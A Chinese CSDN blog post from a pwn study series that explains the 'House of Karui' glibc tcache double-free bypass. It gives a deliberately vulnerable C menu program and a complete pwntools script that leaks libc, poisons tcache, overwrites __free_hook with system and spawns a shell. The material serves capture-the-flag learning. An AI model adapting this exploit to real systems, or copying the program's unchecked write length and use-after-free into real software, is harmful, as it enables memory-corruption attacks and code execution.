【我的 PWN 学习手札】House of Karui —— tcache key 绕过

已于 2024-09-23 21:00:15 修改
阅读量528 收藏 3
点赞数 4
分类专栏: 【我的 PWN 学习手札】 文章标签: pwn ctf heap poisoning tcache double free
于 2024-09-21 20:21:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/142422852
版权

目录

前言

一、House of Karui

二、测试与模板

前言

早期版本的 tcachebin 由于毫无保护,导致攻击利用非常容易,成为重灾区。tcache dup,也即 tcachebin 中的 double free 利用手法,是攻击者常常选用的攻击方式。然而,在glibc-2.29开始,添加了对 tcache key,对 double free 进行了检查。

本篇介绍的 House of Karui 即是一种非常简单的通过溢出来实现绕过,造成double free的方法。

一、House of Karui

double free 两次同一个 tcache 范围的 chunk,会触发:

如果同一个 chunk 被链到同一个 tcachebin 中,那么就会报如上错误。其原理是,第一次释放时进入 tcachebin 中,chunk 会被写入一个 key,如果某一个 chunk 正在被释放,就会遍历对应的整条 tcachebin 链,如果发现同一个 chunk,则报错。

那么我们只需要让这一个 chunk 链入不同的 tcache 即可。怎么实现?——通过溢出(一般是这种情形下),将该 chunk 的 size 进行修改,再次 free 时就会进入不同的 tcachebin 中,也就规避了检查到同一个 chunk。

接下来就是正常申请堆块,然后更改其 next 指针,实现 tcache poisoning,任意地址 malloc 

二、测试与模板

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>

char *chunk_list[0x100];

void menu() {
    puts("1. add chunk");
    puts("2. delete chunk");
    puts("3. edit chunk");
    puts("4. show chunk");
    puts("5. exit");
    puts("choice:");
}

int get_num() {
    char buf[0x10];
    read(0, buf, sizeof(buf));
    return atoi(buf);
}

void add_chunk() {
    puts("index:");
    int index = get_num();
    puts("size:");
    int size = get_num();
    chunk_list[index] = malloc(size);
}

void delete_chunk() {
    puts("index:");
    int index = get_num();
    free(chunk_list[index]);
}

void edit_chunk() {
    puts("index:");
    int index = get_num();
    puts("length:");
    int length = get_num();
    puts("content:");
    read(0, chunk_list[index], length);
}

void show_chunk() {
    puts("index:");
    int index = get_num();
    puts(chunk_list[index]);
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    while (1) {
        menu();
        switch (get_num()) {
            case 1:
                add_chunk();
                break;
            case 2:
                delete_chunk();
                break;
            case 3:
                edit_chunk();
                break;
            case 4:
                show_chunk();
                break;
            case 5:
                exit(0);
            default:
                puts("invalid choice.");
        }
    }
}

from pwn import *
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)
# leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc_base=u64(io.recv(6).ljust(8,b'\x00'))-0x7591b55b6be0+0x7591b5200000
libc.address=libc_base
success(hex(libc_base))
add(0,0x410)

# house of karui
add(0,0x10)
add(1,0x18)
add(2,0x10)
delete(0)
delete(2)
edit(1,0x20,b'a'*0x18+p64(0x30))
delete(2)
add(0,0x20)
edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x18)
add(1,0x18)
edit(1,0x8,p64(libc.sym['system']))
edit(0,0x8,b'/bin/sh\x00')
delete(0)

io.interactive()

Mr_Fmnwon
关注
专栏目录
glibc2.29堆溢出tcache的利用方式及原理
Hello World.c
03-06 8184
ibc2.29 堆溢出tcache的利用方式及原理 Dancing With Heap 与堆共舞 二进制学习之旅 参考资料: ctf-pwn https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-poisoning glibc wiki https://sourceware.org/glib...
CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 5773
CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
【glibc2.29】新增保护机制
weixin_43960998的博客
02-17 576
新增防护机制 1、free 1.1、tcache 通过注释可以看到新增的 key 是为了检测 double free 的。 e->key=tcache,这个 tcache 就是: 也就是 tcache_perthread_struct 的地址,在调试中也就是这里: 即: 循环遍历 tcache 链表上所有的 chunk 进行对比,所以 tcachedouble free 挂了。但是由于 tcache 的特性,他的利用还是要比其他 bins 方便很多。 绕过方式:根据上图,只有当key和t
tcache的利用方法
qq_39869547的博客
10-27 1635
tcache_perthread_struct结构体是用来管理tcache链表: 这个结构体位于heap段的起始位置,且有size:0x251 typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS];//数组长度64,每个元素最大为0x7,仅占用一个字节(对应64个tcache链表) tcache_entr...
Spring-Cache key设置
热门推荐
u013421749的专栏
03-10 1万+
第一种方式:手动设置为了便于key的不重复,我们可以手动设置key有类名、方法名、参数等组合属性名称描述 示例 methodName 当前方法名 #root.methodName method 当前方法 #root.method.name target 当前被调用的对象 #root.target targetClass 当前被调用的对象的class #root.targetClass args 当...
【我的 PWN 学习手札House of Botcake —— tcache key 绕过
Mr_Fmnwon的博客
09-23 473
我们知道,自对 tcachebin 添加了 key 进行了 double free 检查后,利用起来薛微有些困难。double free 绕过检查机制,实则是因为释放时会检查 tcachebin 对应 size 的所有 free chunk。那么如果第二次 free 的 chunk 落入到其他 tcachebin,或者 fastbin,就可以实现绕过。【我的 PWN 学习手札House of Karui —— tcache key 绕过手法-CSDN博客。
【我的 PWN 学习手札】tcache stash with fastbin double free —— tcache key 绕过
Mr_Fmnwon的博客
09-21 1051
tcache key 的引入使得 tcache dup 利用出现了困难。除了简单利用 UAF 覆写 key 或者之外,还可以利用 ptmalloc 中的其他机制进行绕过
【我的 PWN 学习手札】fastbin reverse into tcache —— tcache key 绕过
Mr_Fmnwon的博客
09-24 426
之前提到过,较高版本的 glibc,设置了 key 对 tcachebin 内的 double free 进行了检查。除了前面几篇手札罗列的绕过方法,今天又遇到一个,特此记录。之前利用 fastbin 来进行绕过,参见而此次总结的,也是利用 tcache stash 的机制。话不多说,进入主题。首先申请释放14个chunk然后申请一个,让 tcachebin 空出一个位置接着利用 double free,再次释放 chunk8。
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 3093
强网杯2022 pwn 赛题分析——house_of_cat
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
基于 python 实现的ios混淆脚本工具
10-01
【作品名称】:基于 python 实现的ios混淆脚本工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: . addNative.py 生成oc垃圾代码工具 此脚本会扫描指定目录,给OC文件添加垃圾函数,同时创建垃圾文件到/trash目录。 参数说明 --oc_folder OC_FOLDER OC_FOLDER为OC代码所在目录 --replace替换OC_FOLDER下的原文件,同时原代码会备份到脚本目录下的backup_ios目录。不指定此项垃圾代码只会放到脚本目录下的target_ios/ addNative.py里还有一些配置可以看需求手动修改,如生成垃圾文件的数量,垃圾函数的数量,忽略文件列表等,具体请查看代码顶部相关注释 renameNative.py 修改类名前缀工具 类名是引用可能较为复杂 【资源声明】:本资源作为“参考资料”而不是“定制需求”,代码只能作为参考,不能完全复制照搬。需要有一定的基础能够看懂代码,能够自行调试代码并解决报错,能够自行添加功能修改代码。
基于SOM算法对IRIS数据集分类_Learning-Som_IrisClassification.zip
10-01
基于SOM算法对IRIS数据集分类_Learning-Som_IrisClassification
06_摄影展示小程序.zip
最新发布
10-01
我们的小程序源码功能多样,涵盖社交、电商等领域。高度定制化,轻松打造专属风格。用户体验佳,界面美观操作便捷。安全可靠,保障数据与运行稳定。适合创业者、企业和开发者。提供技术支持与文档说明。快来下载,开启精彩之旅!
大学生创业计划书××信息技术公司商业计划书
10-01
大学生创业计划书××信息技术公司商业计划书
朴素贝叶斯分类Iris数据集_Iris-Bayes.zip
10-01
朴素贝叶斯分类Iris数据集_Iris-Bayes
软件安全实验二——pwn
09-12
你好!很高兴回答你的问题。关于软件安全实验二中的攻击方式Pwn,我可以为你提供一些基本的信息。Pwn是指通过利用软件漏洞来获取对计算机系统的控制权。在实验二中,你可能会学习和尝试使用缓冲区溢出漏洞、格式化字符串漏洞、堆溢出等技术来进行Pwn攻击。 缓冲区溢出是一种常见的Pwn攻击技术,它利用了程序在处理输入数据时没有正确限制长度的漏洞。通过向程序输入过长的数据,可以覆盖到程序运行时的内存空间中的其他重要数据,例如返回地址。通过修改返回地址,攻击者可以控制程序流程,执行恶意代码。 格式化字符串漏洞是另一种常见的Pwn攻击技术。它利用了C语言的格式化字符串函数(如printf、sprintf等)在处理格式化字符串时存在的安全问题。通过向程序输入特定格式的字符串,攻击者可以读取或修改内存中的数据,甚至执行任意代码。 堆溢出是利用堆内存管理中的漏洞进行攻击的一种技术。在使用动态分配内存时,如果没有正确地释放或管理内存,可能会导致堆溢出。通过在堆中溢出写入数据,攻击者可以修改关键数据结构,从而影响程序的执行逻辑。 以上只是Pwn攻击的一些基本概念,实际的Pwn攻击还涉及很多技术和细节。在进行任何Pwn攻击之前,请务必遵循法律和道德规范,并确保你在合法授权的环境中进行实验。 如果你有任何关于Pwn攻击或软件安全实验的具体问题,我会尽力为你解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值